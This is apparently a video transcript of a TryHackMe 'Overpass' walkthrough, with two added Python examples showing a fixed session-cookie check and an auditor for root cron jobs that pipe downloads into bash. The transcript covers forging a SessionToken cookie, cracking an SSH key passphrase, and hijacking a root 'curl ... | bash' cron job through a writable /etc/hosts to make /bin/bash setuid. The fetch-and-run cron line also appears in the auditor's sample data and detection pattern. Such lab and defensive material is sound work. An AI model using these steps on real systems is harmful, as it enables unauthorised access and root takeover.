TryHackMe! Overpass - Authentication Bypass

Captions
Hello everybody, my name is John Hammond. Welcome back to the YouTube video. We're still looking at some TryHackMe, so let's hop on over to my screen and get to it. I want to showcase the Overpass room because I just kind of found it and I thought it was really kind of interesting, a neat idea. I also saw there is an Overpass 2 that is out right now and I want to pore into that, but first we've got to get through with the starting thing.

So the theme, or the kind of prompt, for this box is: what happens when some broke computer science student makes a password manager? I have already submitted flags for this, so please forgive me that those are visible there, but we'll dive in as to how to get to those and find them as we always do. It says, obviously, it's a perfect commercial success whenever computer science students try to make a password manager. There's also a little easter egg: they say there is a TryHackMe subscription code hidden on this box; the first person to find and activate it will get one month subscription for free, and if you're already a subscriber you can just give the code away and do some good stuff. But that has already been claimed; this room is about a month old. I realize my face is kind of in the way so you can't see that message there, but anyway, we have our machine IP address, it's up and it's running, and I'm connected to the VPN, so let's get started and try and work with it.

I will make a directory for youtube/overpass so we have a place to work, and I'll get started with an nmap scan while we kind of put together our notes document. So nmap, -sC for default scripts, -sV to search for versions, -oN so I end up with nmap output in a simple nmap format, and of course I'll paste in the IP address. All right, while that's running let's make a simple README file so we can kind of keep track of things. I tend to do that just because it's good practice. Sometimes while I'm doing this video I might just sort of forget, please forgive me. It is currently August 18th, 2020, and I'll slap my name in there, maybe if you just end up throwing this in GitHub or something, or you're just sharing your notes in your repository, who knows what you're working on. We'll just go ahead and copy these prompts here, slap them in, good enough, easy peasy.

I realize there is a TryHackMe API that you could use, it's like a library in Python, and I need to tinker with that because I want to write a script that could do something like this for larger rooms that have more information in them, because that way you'll just automatically have this README and you won't have to really work with much.

We've got some interesting stuff open; our nmap scan is up and accessible, so let's check that out. Looks like we have port 22 open, so classic SSH, looks like it's running on Ubuntu, and port 80, HTTP, and it's Golang. Interesting, you don't often see that, very cool. Okay, looks like that's it, looks like we only have those two ports. Just to be safe, let's turn off those safe scripts or whatever those are and let's run our all-port scan with -p- all those. There we go, let's get started to run that, and let's explore that web page while we know that that's a thing.

All right, just opening up the IP address in our web browser, it says "Welcome to Overpass, a secure password manager with support for Windows, Linux, macOS and more." This is interesting because it's like an actual, relatively somewhat of a web page here. "People reuse the same password for multiple services. If you're one of them, you're risking your accounts being hacked by evil hackers. Overpass allows you to secure different passwords for every service, protected using military-grade cryptography to keep you safe." Oh yeah, okay. "Passwords never transmitted over the internet in any form. Unlike password managers, Overpass does not store your passwords, unlike other password managers. Download Overpass today." All right, let's check out the source; I just hit Ctrl+U on my keyboard to do that. Looks like they are loading local JavaScript and console.log("hello world"), so if I were to go back to the page and check out the console tab, yep, you can see that guy right there. Nice, cool, great.

I'm also just going to take a look at the CSS file in case they hide anything in there; I think that's kind of good practice, just something good to do. Images I'm not extremely concerned about; if we kind of run out of things to do we could do like cheesy stego on that or some other reconnaissance. But oh, there's an HTML comment here: "Yeah right, just because the Romans used it doesn't make it military grade, change this." Ah, okay, Romans using secure cryptography, that hints towards ROT13 and Caesar ciphers, right? So okay, that's clearly not incredibly strong cryptography.

There's a downloads page, so let's go check that out. Hop on over here: "Stay safe against hackers, use Overpass." Oh, and they have pre-compiled binaries and they have the source code. Nice, okay. Anything else in this overpass.go, build scripts? These are all in a specific directory, build. Oh, what's in that About Us page? Sorry, before I forget, I just kind of want to keep looking around. Anything here in this source? Nope, nothing hiding. Oh, I like that, Szymex is in there, Ninja, cool. This is really cool, all the TryHackMe guys, I love it, great.

Okay, let's take a look at this code that they're showcasing here, source code and build script. Let's look at this thing. Oh, I already have these files downloaded, that's embarrassing, they're still in my Downloads folder, who cares, illusion, art, artifice. Let me make a directory for source and let's move ~/Downloads/overpass.go, sorry, into here, same thing with build. I still have the binary itself, so we'll put that in here as well. So let's take a look at those, let's take a look at the source code, overpass.go, and it's written in Go, kind of neat. I wish I were smarter in Go, I wish I could just write Go as well as I could write Python, because that language is crazy cool, it's able to do stuff everywhere, other than the scripts and binaries being megs in size. But okay.

Looks like a pass list entry is a structure, so it has a name and a password, and a function for rot47. Excellent, "the secure encryption algorithm", blatantly ripped and stolen from this URL. Okay, incredible. I will press the "I believe" button on that and say that that just does a regular rot47, at least for now; if it does do anything else and we just don't see it, then whatever, we don't need to worry with it, we can go ahead and reverse engineer it as needed. Save creds to file: where does it save all these, does it have a path, like a default path? Load creds from file, JSON. Input, oh, Python-style input function, neato. Search password for service. I'm just kind of slowly, cursorily looking through these to get an idea for what these functions are and what they do; I don't think there's any obvious glaring bad eval or unsafe function that might be sticking out, but it's good to kind of peruse through this. Delete password from service, how does it do that? "Not found". Print all passwords, and it just loops through all of them, okay. Oh, the creds path is in the home directory, .overpass, good to know, and that's probably stored in some marshalled or whatever JSON format as we saw up top. Okay, and we have this menu here, just a little command line interface to answer or select one option. That's pretty easy enough. They did have the binaries so we could just kind of tinker with it and play with it, let's do that.

Oh, what was that build script? Sorry, before I forget: buildscript.sh. GOOS, which is always fun, that's in Go, setting an environment variable for how to install it and work with it. Overpass code, does it just do it for literally everything? That's awesome. And echo the date, builds completed. Oh, it's just kind of like command substitution in there to get the date; maybe we could potentially abuse that at some point. Obviously we've just downloaded this locally, but we are supposed to get into this box somehow, so we should mess with that. All right, whatever.

Let's take a look at the binary. You could download it; I have already downloaded it, I'm just going to grab the Linux one. It didn't download because I didn't click it hard enough apparently, but I still have the binary from doing it earlier, so let's move that in here and let's look at it. I now realize typing at the bottom of my screen might annoy you, sorry. Mark that as executable, overpassLinux, and run it. There we go. Let's just hop over into another window up here so I'm not at the very bottom of my screen, because I heard some people say, hey, I don't like to read it because the YouTube play stuff gets in the way. So here we go: "Welcome to Overpass. Retrieve a password for a service": 1, john, that's it, it died, okay. Retrieve all passwords: john. Oh, again, this also still exists because of my home directory .overpass, man, I'm really ruining the illusion here. Right, so this is rot47, this is the weird notation that it's apparently encrypting and storing all the stuff in. Keep note, you can normally identify rot47 by the weird random sheer amount of punctuation marks. I'll just do a simple stupid online rot47 decoder, slap that in, decrypt, okay, yeah. So now you might be able to see I have john, john: john is the name and john is the password. Super boring, but that's how it would simply work.

Okay, so now that we've looked at this code and we've looked at this source, we've looked at this build script, we looked at the executable, I don't see a whole lot else here. And since they give us an actual website, sometimes you're like, oh wait, whoops, I spent so much time exploring the website that I forgot to run my regular normal enumeration procedures. So don't forget: fire up that simple nikto, I'll tee that to nikto.log if I can type, great. Also do the same with a little gobuster; I'll do a gobuster dir attack, -u with that URL, and we'll use -w for my wordlist, and then I store the directory-list medium over in my /opt directory, and we will fire that off. Okay, we'll see what that comes up with. Realistically we probably should have been running that while we were looking through.

Oh, did it fail? And that HTTP client, is that the right, that is the right IP address, can I ping that thing? Oh sorry, yep. Is it just because nikto's working? That's funny, "error running gobuster". I don't know if you can see that typo there, nice, let's do it again. Maybe I'll stop nikto, we'll let gobuster have a little bit of precedence here. Still dies. All right, let me pause and figure this out. Oh, you know what, it might be that annoying nmap scan beating it up. Maybe I don't need a trailing forward slash, let's see if that will work. There we go. All right, turning off the nmap scan, just kind of let it do its thing, that's fine. aboutus, downloads, img, we saw that already. Oh, a /admin, that is something we had not seen or looked at before, so let's hop over there. /admin, administrator access: looks like we need credentials, "Please log in to access this content." Okay, we could try the basic stupid admin/admin, that doesn't work; admin/password, that doesn't work. We could try for basic stupid SQL injection, OR 1=1, using two hyphens to do a SQLite comment, using a hashtag or an octothorpe to do it with the MySQL syntax, switching it up to a single quote or a double quote for strings. None of those work, okay. Is there anything on this page that's interesting? Body only, another CSS file, okay, nothing there interesting anyway. main.js as usual, oh, but there's a login.js and a cookie.js, that's peculiar. What is that cookie? Oh okay, that's just a regular minified library used in other places, js-cookie, MIT license, so that might not be too interesting for us. How about login.js? Okay, yeah, this looks custom, this looks like it's just written specifically for this.

So we have a postData function with a URL and data: response, await fetch of a URL with the POST method, credentials, headers, URL-form-encoded, follow any redirect, get the body, and then return the response. Okay, sometimes it's not always JSON, that's peculiar. encodeFormData, that looks like it just kind of puts it into, yeah, like a POST data format. onload, which we saw in the source code would run as soon as the page loaded, okay, would look for a login; on you clicking submit it will run the login function rather than submitting the form as HTML normally would. So this login function is where all the interesting stuff happens. Okay, we have usernameBox, which is getting all the information out of that field, same thing with passwords, same thing with login text content equals nothing. creds is just going to be a little dictionary, associative array, hash table, with the values pulled from the fields, and we will POST to that resource, /api/login, with our creds, and it'll get a constant statusOrCookie with the response object from that postData function returning. Okay, and then we do a check in client-side code in JavaScript: so if the statusOrCookie is === "Incorrect credentials" then we know that failed, gotcha. Or otherwise, huh, oh, we set a cookie, SessionToken, to statusOrCookie, window.location, okay, so it brings us to the exact same page, it just has a cookie working. But that's interesting, because what could that value be? Obviously if it's just not "Incorrect credentials" it could just be literally anything, right? What could that be? If we were to set that, would that work? If we just set that to anything, literally, we could control that, because a cookie is something we can tamper with just as easily. Let me try that in curl. So let's make gobuster shut up and let's try to close out some of these because we don't need these to take up the entire terminal for us. Let's hop over to the original page, right, and let's try and curl that just to get it from the command line.

I don't have a cookie editor quickly installed, like a cookie editor browser plugin or manager on my Firefox or my Chrome here, so I'm just going to use a simple curl for a proof of concept. I'm going to specify -H to use a header, will that work? I'd have to use a Set-Cookie thing. I think curl just has a --cookies, yeah, nope, --cookies is unknown, is it --cookie? Yeah, --cookie requires a parameter, okay, quick troubleshooting to see if that command line argument actually exists. So we'll specify, what was the name of that, SessionToken, yeah, we'll set it equal to literally anything, and we have a private key. Okay, so I guess that did work. Since it's all JavaScript, we could probably do the exact same thing; this code would run in the context of this window because it's pulling in that cookie.js, so if I were to open up the console again and just slap the syntax in: statusOrCookie is not defined, that variable we can just set once again to literally anything. Now if I refresh this page, that cookie is set and we can see it in our browser: "Since you keep forgetting your password, James, I've set up SSH keys for you. If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you. Also, we really need to talk about this military grade encryption." Nice, okay, so here's a private key. Reading that prompt, it sounds like we need to crack a password for this thing, so let's make a directory for ssh and slap this in here as an id_rsa. Don't forget to include a new line at the very, very end of your private key; that can trip you up sometimes if it says unknown format or something. Let's mark it as our own, so chmod 600, and I'm assuming we'll have a username james because it references this individual James here. So let's grab that IP address and try to ssh -i with that id_rsa, james@ this IP address, not a URL please, thank you. See if that will work for us.

Yep, I'm totally cool with connecting to it, let's do it. We need a passphrase, okay. Let's do that with John the Ripper. So I have /opt/rockyou.txt, I have this regular wordlist for brute forcing that's just in my /opt directory, there's tons and tons of stuff, and I also have John the Ripper, so that's in /opt/JohnTheRipper/run/john. If you don't have that installed, go grab it off of their GitHub repository, it's magnumripper/JohnTheRipper, it's a community edition, jumbo John I think it's called, and then just go into the source directory, do a ./configure and do a make and install, and it'll build it all for you. So super easy, super cool. Let's run john on, actually, we need to convert to this specific format, right, because John will offer some scripts like ssh2john that will take a file format and convert it into something that John the Ripper could work with. So I'll just make a forjohn.txt, that's good. Now with that done we can run john on that forjohn.txt, but let me specify the wordlist here, I'll use /opt/rockyou, that wordlist, for him, and I'll run forjohn and let's see if he gets a hit. And he does, okay, so james13 is apparently that password. Cool, cool, that's loads of fun. What are you doing over there, John the Ripper, what are you doing? Let's just stop that, actually, because I don't need this extra session when I still have that in my command history. This thing, connect to it please, and the password should be james13.

Good, good, good, I typed that right, let it connect. Okay, let me pause this video real quick. Okay, that took forever, but I have code exec, I'm on the box, I SSH'd in. So okay, in our home directory as this james user I can see a user.txt file which we will cat out here, cat that out, and that will give us our points for that user. Though we also have a little todo.txt which is interesting: "Update Overpass encryption, Burlin is complaining that it's not strong enough. Write down my password somewhere on a sticky note so I don't forget it. Wait, we make a password manager, why not just use that? Test Overpass for macOS, it builds fine but I'm not sure it actually works. Ask Paradox how we got the automated build script working and where the builds go, they're not updating on the website." Ah, automated build script, is it still running here? Because I know we had that thought, we could maybe get in the middle of that date command running or something. Okay, whatever, let's see if we have a password; he mentioned he has been using the password manager. Oh, and we have an .overpass file, okay, so that hidden directory again, right. So let's cat out that .overpass and we see his information; it's simple rot47, so I had that rot47 decoder online and I could just once again slap that in, go. Name: system, pass: saydrawnlyingpicture, okay, whatever. Is system referring to this system, like would I be able to sudo, like is that his password? If I paste that in, okay, that is his password, but james can't run sudo. Boring. Okay, we could do a regular enumeration: are there any other users we can get into? There's a tryhackme user, nope, can't get into that. Anything in /root? Nothing particularly interesting. Okay, so let's throw LinEnum or LinPEAS in here, let's see if we can find a way around this. I'm going to use Quake, which I use as part of my cheesy poor man's pen test framework ideas, because I would like to be able to upload or download a file, right. So I have these commands like upload file with netcat or wget or another method to get a file on the box. Normally, if you're using this with pwncat it's much better, and we could get a pwncat shell if we wanted to, but I'll just showcase this one because I think LinPEAS might highlight some things a little bit better for your learning and for us to walk through this together. So let me show you what that is before I just totally say that this is what we're going to do and then you don't understand any of it.

So let's fire that up in Sublime Text. I'm using my /opt/poormanspentest functions, and that will grab my IP address, my localhost IP address, so it knows, or my tun0 IP address, excuse me, so it knows how to reach the VPN and that box and back and forth, a random port; it'll specify a file name out of this command line argument we pass in; we'll hide Quake, which is how I'm invoking this, and we'll get focus back to our actual window, and we will run a netcat listener grabbing this file on our host, and then we'll send the command with xte, or X automation, to simulate typing on the victim this netcat command to download and pull this file in. So that's all that's doing, this silly poor man's pen test, because I'm automating keystrokes inside of my reverse shell so I can quote-unquote script inside of it. You don't have that real functionality, but pwncat will let you do that, so I would always recommend to use pwncat, but I guess I'm just not in this case, stupid me. Let's upload LinPEAS, there we go, that slapped in, I'm going to give it a second, I'll check. Okay, yeah, Quake says it's got everything, it's done, so let me close out of that. It just threw it in /dev/shm, shared memory, because I like to hide in there. file says it is a shell script, so let's run it, ./ okay, marked as executable, worked, a ton of stuff.

I'm using one of the later versions of LinPEAS, I think, or at least newer than I had run previously, because now it'll cache directories or be able to figure out a lot of good stuff. So we'll let that go and then we'll start to look through it; I guess we can kind of look through it as it's going, so nothing wrong with that. LinPEAS: we have ping, we have netcat, incredible, old sudo version, good to note. Kind of exploring and see if there's anything that just jumps out. LinPEAS is great because it'll color code things that are potentially or very, very likely a privilege escalation. Utility, useful software: we have a lot, Python, we have base64, all these things, we have compilers, goodness. Root is running some stuff, cron, cron's in there, why are they running cron? I wonder if that's that automatic build script. Cron jobs, has some, yeah, those are all defaults, they look like defaults. Oh, what is that line? So that's cron syntax: so every minute of every day, every hour of every day of every month, as the user root, interesting, we will curl overpass.thm, looks like a little hostname or domain name, /downloads/src/buildscript.sh and pipe it to bash. Whoa, okay, funky. That is an obvious and egregious method that we could abuse to privilege escalate, because if root's running that then we'll get code execution as root if that's just getting piped into bash. Can we control that, though? At overpass.thm, where are they setting that domain name? That's normally in /etc/hosts. Do we have write access to /etc/hosts? That's normally a weird thing. Hostname, okay, yeah, we can see that hostname, hosts and DNS, that's definitely the output of our /etc/hosts file, but can I write to that? That's odd. Listening ports, super users are root, yep, okay. tryhackme looks like, dragon, has a lot of privileges, he's in sudo, blah blah blah blah, rsync stuff, possible private keys, yep, we found those, we have those. Cloud-init files, SUID files, nothing stands out to me, capabilities, weird to see a CD-ROM file, okay, modified, interesting. Oh, GPG stuff, that's peculiar. Writable log files, backup files, all hidden files, there's a lot in here, whoa, okay, I don't need to see all that. Interesting, right off: interesting writable files owned by me or writable by everyone that are not in my home directory, /etc/hosts is in the list. Okay, okay, cool.

So if we can modify /etc/hosts then what we could do is we could act as that curl command, right, that was in, oh boy, I've got to find it again now. It was the curling overpass.thm/downloads/src/buildscript.sh piped to bash, and that would run every minute, right. So if I were to try and do that now, looks like it's getting, okay, the one off of this website, but let's modify that. So right now let me change this profile; this will be the victim that we're in, and this will be my server, my machine, because I want to know my IP address. If I could type: tun0 IP address, ip address show, my IP address there. And let's modify that /etc/hosts file, because we do have write access in there supposedly, and let's change the overpass.thm location and make it my address. Yeah, so that way if I were to ping overpass.thm you can see now I'm actually reaching my attacker machine. Great. So let's make a little directory for ourselves and we'll fake and simulate, pseudo-create the same file structure as what that command is expecting in cron as it's running every minute. So let me make, let's see, it's downloads, src, and then we have the script itself, so let's mkdir -p to make all of those directories, let's hop in there, and let's create a simple bash script, buildscript.sh, that will #!/bin/bash, there we go, and we can have this do literally whatever we want because that will be executed through bash. I think the easiest way to give us accessible root privileges is make the bash binary setuid, so that way we'll be able to invoke it and keep our root privileges. So right now if you check out the permissions on /bin/bash, sure, it is owned by root, executable, but it doesn't have a sticky bit set, or it's not setuid. Using that, we could just invoke it with -p and that way we could maintain root readily and easily. You could do other things like call back a reverse shell or whatever you want, but I want to keep it in this for simplicity's sake.

All right, let's hurry it up because we're getting to a really long video and this really doesn't need to be. So let's get back to the root of this directory, right, let's actually watch this, ls -la, and see when it's going to hit. Looks like I still have like half a minute to go, and we know from the cron output this will happen on the clock, every minute on the minute. So let's fire up my HTTP server, and that's going to listen on port 8000 by default, so if I want to specify port 80 I could specify that as a last argument, but we need root privileges to do that on my Ubuntu system, so let me sudo python -m that, type in my password as fast as I can. Great, now we are very, very close to the end of the minute, so we should see a GET request come through on our attacker machine. Done, and we should see this switch to an s, or a sticky bit, setuid. All right, so let's stop watching that and let's /bin/bash -p and now we're root. Very, very cool. We were just abusing that little curl command that's in cron that is running commands as root, and it's pulled from an external resource, or at least we can control where that resource is because it's in the /etc/hosts file that we have write access to. So we could hop on over to /root and we could simply cat out that root.txt and be done with it. Nice, nice, nice. The easter egg, if you wanted to, you could go find that. Whoa, careful there, John. If you wanted to, you could go check out tryhackme, that user account that we saw; he does have an Overpass account, so we could cat out that file and see what other information that might have. As usual, it's just rot47, so we can go hop over to this little decoder, decrypt that, and, kind of cheesy, there's a little TryHackMe subscription code, but someone has already found that, right, no sense trying to submit it.

But very, very neat, very, very cool, very, very fun. I really liked the idea of this box and that was kind of fun, and it was cool to work through some of those, and I liked that simple /etc/hosts trick. So I hope you guys thought that was also very neat, very enjoyable. Take good notes if that's something that you want to do; as usual I started the README file and then did nothing with it whatsoever. But hey, thank you guys so much for watching, I really hope you enjoyed this video. If you did, please do press that like button, do the YouTube algorithm things, leave me a comment, hopefully subscribe. Thank you, you guys are the best, thanks so much for watching, I'll see you in the next video. Take care.
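The authentication bypass in the walkthrough works because the server treats the mere presence of a SessionToken cookie as proof of login, so a value typed into the browser console or passed to curl --cookie is accepted. The following is an added illustration, not code from the video or from the Overpass project: it contrasts a check modelled on that broken behaviour with one that only honours tokens the server itself issued and tracks. The cookie name SessionToken is taken from the login.js the video describes; the session store, the TTL and the clock parameter are assumptions made for the example.

```python
import hashlib
import secrets
import time

# Cookie name as seen in the login.js described in the walkthrough.
COOKIE_NAME = "SessionToken"
SESSION_TTL_SECONDS = 3600

# Constructed in-memory session store: sha256(token) -> (username, expiry timestamp).
# Storing the hash rather than the token means a leaked store does not hand out live sessions.
_SESSIONS = {}


def _digest(token):
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def login_vulnerable(cookies):
    """Broken check modelled on the behaviour the walkthrough exploits: the admin page is
    served whenever a SessionToken cookie is present, without asking whether the server
    ever issued that value. Any non-empty string passes."""
    token = cookies.get(COOKIE_NAME, "")
    return token != ""


def issue_session(username, now=None):
    """Create a server-side session and return the random token to set as the cookie."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)            # 256 bits from the OS CSPRNG, unguessable
    _SESSIONS[_digest(token)] = (username, now + SESSION_TTL_SECONDS)
    return token


def login_hardened(cookies, now=None):
    """Return the username bound to the cookie, or None if the token was not issued by
    this server or has expired. Presence of the cookie alone proves nothing."""
    now = time.time() if now is None else now
    token = cookies.get(COOKIE_NAME, "")
    if not token:
        return None
    key = _digest(token)
    entry = _SESSIONS.get(key)
    if entry is None:
        return None                               # client-chosen value: reject
    username, expiry = entry
    if now >= expiry:
        del _SESSIONS[key]                        # expired: purge and reject
        return None
    return username


if __name__ == "__main__":
    forged = {COOKIE_NAME: "literally-anything"}  # the cookie set by hand in the browser console
    print("vulnerable check accepts forged cookie:", login_vulnerable(forged))
    print("hardened check accepts forged cookie:", login_hardened(forged) is not None)
    real = {COOKIE_NAME: issue_session("james")}
    print("hardened check maps issued token to:", login_hardened(real))
```

The fix is entirely server-side: the /api/login handler should create the session and set the cookie itself (with HttpOnly, Secure and SameSite attributes) instead of returning a value for client-side JavaScript to store, and every protected request must look the token up rather than test for its existence.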
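The privilege escalation at the end relies on two misconfigurations combining: a root cron job that pipes a script fetched by hostname straight into bash, and an /etc/hosts file that unprivileged users can write, so the hostname can be pointed anywhere. An administrator auditing a host for exactly this pattern would check both together. The following is an added example written for this page, not a tool from the video or from LinPEAS: the crontab and hosts samples are constructed (only the overpass.thm hostname and the curl | bash job shape come from the walkthrough), the regexes are heuristics, and audit_files is an assumed convenience wrapper over the real files.

```python
import os
import re
import stat

# Constructed sample system crontab (not copied from the box): one default entry and one
# entry in the shape the walkthrough found, root fetching a script by hostname into bash.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
"""

# Constructed /etc/hosts that pins the hostname the job fetches from.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.0.1 overpass.thm
"""

# curl/wget whose output is piped straight into a shell (heuristic, not a full shell parser).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(?:ba|z|da)?sh\b")
# First hostname followed by a path in the command; scheme optional, as in the cron line.
HOST_IN_URL = re.compile(r"(?:https?://)?([A-Za-z0-9][A-Za-z0-9.-]*)/")


def find_pipe_to_shell_jobs(crontab_text):
    """Return (user, host, command) for system-crontab lines that fetch a script into a shell."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                        # blank, comment, or VAR=value line
        fields = line.split(None, 6)        # minute hour dom month dow user command
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        if PIPE_TO_SHELL.search(command):
            m = HOST_IN_URL.search(command)
            findings.append((user, m.group(1) if m else None, command))
    return findings


def hosts_mappings(hosts_text, hostname):
    """Addresses a hosts file maps hostname to; with the usual 'files dns' order these beat DNS."""
    addrs = []
    for raw in hosts_text.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) >= 2 and hostname in parts[1:]:
            addrs.append(parts[0])
    return addrs


def mode_writable_by_others(mode):
    """True when group or other has write permission in this st_mode value."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(crontab_text, hosts_text, hosts_mode):
    """Rate each curl|sh style job. A root job is 'high'; if the hostname it fetches from is
    pinned in a hosts file that non-root users can write it becomes 'critical', because
    whoever can edit that file chooses which server root downloads code from."""
    report = []
    for user, host, command in find_pipe_to_shell_jobs(crontab_text):
        pinned = hosts_mappings(hosts_text, host) if host else []
        severity = "high" if user == "root" else "medium"
        if pinned and mode_writable_by_others(hosts_mode):
            severity = "critical"
        report.append({"user": user, "host": host, "pinned_to": pinned,
                       "severity": severity, "command": command})
    return report


def audit_files(crontab_path="/etc/crontab", hosts_path="/etc/hosts"):
    """Run the same checks against the real files on the current host (assumed wrapper)."""
    with open(crontab_path) as crontab, open(hosts_path) as hosts:
        return audit(crontab.read(), hosts.read(), os.stat(hosts_path).st_mode)


if __name__ == "__main__":
    # 0o666 models the world-writable /etc/hosts LinPEAS flagged on the box.
    for f in audit(SAMPLE_CRONTAB, SAMPLE_HOSTS, 0o666):
        print(f["severity"].upper(), f["user"], f["host"], f["pinned_to"], f["command"])
```

Either half of the finding is worth fixing on its own: the job should run a locally installed, root-owned script (or at least verify a signature or pinned hash before executing anything it downloads), and /etc/hosts should be mode 0644 and owned by root. Per-user crontabs and /etc/cron.d files have the same column layout the parser expects for the system crontab, except that per-user files omit the user column.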
Info
Channel: John Hammond
Views: 134,890
Id: NGNnxD0gNDw
Length: 35min 18sec (2118 seconds)
Published: Wed Aug 19 2020